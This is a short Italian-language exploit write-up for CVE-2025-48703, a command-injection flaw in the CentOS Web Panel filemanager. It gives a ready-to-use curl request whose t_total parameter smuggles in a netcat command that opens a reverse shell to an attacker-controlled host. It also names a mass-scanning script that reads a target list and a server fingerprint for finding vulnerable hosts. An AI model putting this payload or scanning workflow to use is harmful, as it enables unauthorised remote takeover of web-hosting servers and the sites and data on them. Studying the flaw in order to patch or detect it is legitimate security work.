
Esecuzione di codice da remoto nel pannello web CentOS
CVE-2025-48703 è una vulnerabilità di esecuzione di codice remoto (RCE) nel modulo filemanager di un pannello di controllo di web hosting (es. cPanel). Si verifica a causa della gestione non sanificata dell'input nella funzione acc=changePerm, che consente a un attaccante di iniettare ed eseguire comandi di sistema arbitrari utilizzando il parametro t_total.
Questa vulnerabilità consente agli attaccanti di:
⚠️ Questo attacco può essere eseguito con un'autenticazione minima o, in alcune configurazioni, con accesso non autenticato.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv
Riferimento: https://fenrisk.com/rce-centos-webpanel